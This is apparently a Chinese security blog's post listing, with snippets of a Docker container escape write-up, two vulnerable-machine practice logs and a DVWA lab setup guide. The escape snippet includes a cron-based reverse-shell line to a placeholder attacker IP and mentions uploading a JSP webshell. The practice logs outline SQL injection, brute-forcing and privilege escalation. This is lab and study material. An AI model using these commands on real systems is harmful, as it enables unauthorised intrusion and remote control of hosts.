- 博客(4)
- 收藏
- 关注
原创 记一次docker逃逸
利用命令cat /proc/self/status |grep Cap判断是否是以特权模式启动,出现0000003fffffffff说明是以特权模式启动。在主机目录的/var/spool/cron/crontabs下创建计划任务列表,进行反弹shell。* * * * * bash -i >&/dev/tcp/攻击机IP/9999 0>&1。查看是否为docker,发现.dockerenv文件说明存在docker。发现执行成功,尝试上传jsp木马。上传成功,利用哥斯拉进行连接。#将主机挂载到目录下。
2023-11-09 10:48:52
75
1
原创 打靶记录-Hackademic.RTB1
(2)发现该用户权限过低,使用GeorgeMiller进行登录,在后台开启上传功能,同时允许上传php文件。(3)进一步测试,发现输入and 1=1 和 and 1=2页面异常,确定存在sql注入。(1)点击Uncategorized发现以下内容,判断可能存在sql注入。发现一个ip开启了80端口,在浏览器进行访问,确认该ip为目标机器。(4)判断列数,order by 5不报错6报错,存在5列。靶机:给出c段192.168.224.0/24。(1)利用sql注入获取的用户数据进行登录。
2023-10-31 08:57:59
101
1
原创 打靶练习-MoneyBox
(3)利用linux/local/sudo_baron_samedit脚本进行提权,提权失败。(3)利用steghide info trytofind.jpg查看图片是否存在隐写。(1)尝试登录ftp发现只能使用anymous登录,利用anoymous登录。在最下面发现信息,提示另一个秘密目录S3cr3t-T3xt,进行访问。(2)将会话挂到后台,使用扫描模块扫描能够利用的提权脚本。(3)根据内容存在renu用户,对该用户进行暴力破解。(2)查看文件,并下载是一个图片文件,可能存在隐写。
2023-10-30 14:10:04
96
原创 Centos7部署DVWA靶场
进入DVWA-master/config/目录下,复制config.inc.php.dist文件为config.inc.php。链接:https://pan.baidu.com/s/1oQAJZzHGRosX9WD_AGKN1Q?下载完成解压后上传到centos7的apache根目录/var/www/html下。首先将/etc/httpd/conf.d/welcome.conf全部注释掉。编辑php配置文件php.ini该文件一般是在/etc/php.ini路径。在浏览器中使用ip进行访问。
2023-08-08 21:38:15
1193
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人